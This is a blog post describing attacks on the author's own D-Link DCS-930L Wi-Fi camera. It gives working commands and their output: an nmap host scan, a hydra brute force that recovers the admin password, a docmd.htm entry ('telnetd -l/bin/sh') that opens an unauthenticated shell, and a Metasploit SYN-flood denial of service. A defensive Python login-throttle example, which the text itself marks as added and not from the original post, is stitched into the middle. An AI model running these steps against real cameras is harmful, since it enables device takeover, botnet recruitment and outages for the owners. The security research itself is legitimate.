Internet of Things -- D-Link DCS-930L
- by Vince
With the recent talk about hijacking IP cameras for the purposes of creating a bot army, I decided to order a camera. I'd seen this model or one like it in my local lunch place and I ordered one from Amazon. Two days later, I got my target, a "D-Link DCS-930L Wi-Fi Camera with Remote Viewing". Nothing fancy really. Just a $30 camera that can be used wired or wirelessly, but apparently only good for "day use". It will serve my purpose though. Army of one.
Pretending like I don't know where it's located --
nmap -sP -PI 192.168.50.0/24 | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > ip.list
nmap --open -iL ip.list -p 80,443
Starting Nmap 6.47 ( http://nmap.org ) at 2017-01-11 05:28 CST
Nmap scan report for DCS-930LB.sevenlayers.com (192.168.50.141)
Host is up (0.00082s latency).
PORT STATE SERVICE
80/tcp open http
443/tcp open https
MAC Address: B0:C5:54:XX:XX:XX (D-Link International)
The first nmap statement is just a ping scan and I'm redirecting the output to a file. The second nmap statement reads the ip.list file for targets and looks for web servers on port 80 or 443.
I open up my browser, point it to the web interface, and I'm presented, as you would imagine, with a login prompt. My first gripe: the camera is set up with a default user of admin and no password. I'm going to be secure, and to make this a little more challenging, I'll set it up with the following password: 1982hondacivic
Second gripe -- nothing to prevent a brute force attack. Furiously bashing it with my password list did cause a pause around every 2000 guesses, but then it picks up again. I don't think that's a protection mechanism as much as the brute force acting as a DDoS on the camera.
hydra -l admin -P ./BigPassList.txt -e ns -f -V 192.168.50.141 http-get /
After what was probably five minutes --
[80][http-get] host: 192.168.50.141 login: admin password: 1982hondacivic
[STATUS] attack finished for 192.168.50.141 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-01-11 05:47:44
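The control missing in the second gripe, sketched as an added example (not D-Link's firmware and not code from the original post): a per-client login throttle with exponential lockout, replayed against a constructed stream of wrong guesses. The LoginThrottle class, the guesses_checked helper, the 10 guesses per second rate and the 192.0.2.10 address are all assumptions made for illustration.

```python
# Added example: per-client login throttle with exponential lockout.
# All names, thresholds and the sample traffic are constructed.
from collections import defaultdict


class LoginThrottle:
    def __init__(self, free_failures=5, base_lock=2.0, max_lock=900.0):
        self.free_failures = free_failures   # failures tolerated before locking
        self.base_lock = base_lock           # first lockout, in seconds
        self.max_lock = max_lock             # cap so a lockout always expires
        self.failures = defaultdict(int)     # key -> consecutive failures
        self.locked_until = defaultdict(float)  # key -> unlock timestamp

    def allowed(self, key, now):
        """True if this client may have its password checked at time `now`."""
        return now >= self.locked_until[key]

    def record(self, key, now, success):
        """Update state after a password check for `key` at time `now`."""
        if success:
            self.failures.pop(key, None)
            self.locked_until.pop(key, None)
            return
        self.failures[key] += 1
        over = self.failures[key] - self.free_failures
        if over > 0:  # double the lockout on every failure past the allowance
            lock = min(self.base_lock * 2 ** (over - 1), self.max_lock)
            self.locked_until[key] = now + lock


def guesses_checked(throttle, rate_per_s, duration_s,
                    key=("192.0.2.10", "admin")):
    """Replay wrong guesses at a fixed rate; count those reaching the check.

    Key is (source IP, username): locking on username alone would let anyone
    lock the real admin out.
    """
    checked = 0
    for i in range(int(rate_per_s * duration_s)):
        now = i / rate_per_s
        if throttle is not None and not throttle.allowed(key, now):
            continue  # rejected up front, password never compared
        checked += 1
        if throttle is not None:
            throttle.record(key, now, success=False)
    return checked


if __name__ == "__main__":
    print("no throttle:", guesses_checked(None, 10, 300))
    print("throttled:  ", guesses_checked(LoginThrottle(), 10, 300))
```

Over five minutes of the constructed stream, 13 passwords get checked with the throttle in place, against 3000 without it.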
With credentials, I am able to log in and perform all of the normal functions. But I also ran a scanner across the directory structure and discovered a few interesting directories and pages.
The following is a list. I've not explored them all, but there are other interesting things to play with.
http://192.168.50.141/html.htm
/email.htm -- it can mail things.
Another really interesting page, once authenticated --
http://192.168.50.141/docmd.htm
In the system command prompt, enter: telnetd -l/bin/sh
The above will enable telnet, no authentication required. You now have access to the camera from a command line.
I haven't tried an " rm -r " because I think it will work and I don't want to brick my camera.
And finally, with or without authentication, the following will DDoS this thing into oblivion:
msf auxiliary(synflood) > show options
Module options (auxiliary/dos/tcp/synflood):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
INTERFACE                   no        The name of the interface
NUM                         no        Number of SYNs to send (else unlimited)
RHOST      192.168.50.141   yes       The target address
RPORT      80               yes       The target port
SHOST                       no        The spoofable source address (else randomizes)
SNAPLEN    65535            yes       The number of bytes to capture
SPORT                       no        The source port (else randomizes)
TIMEOUT    500              yes       The number of seconds to wait for new data
msf auxiliary(synflood) > run
[*] SYN flooding 192.168.50.141:80...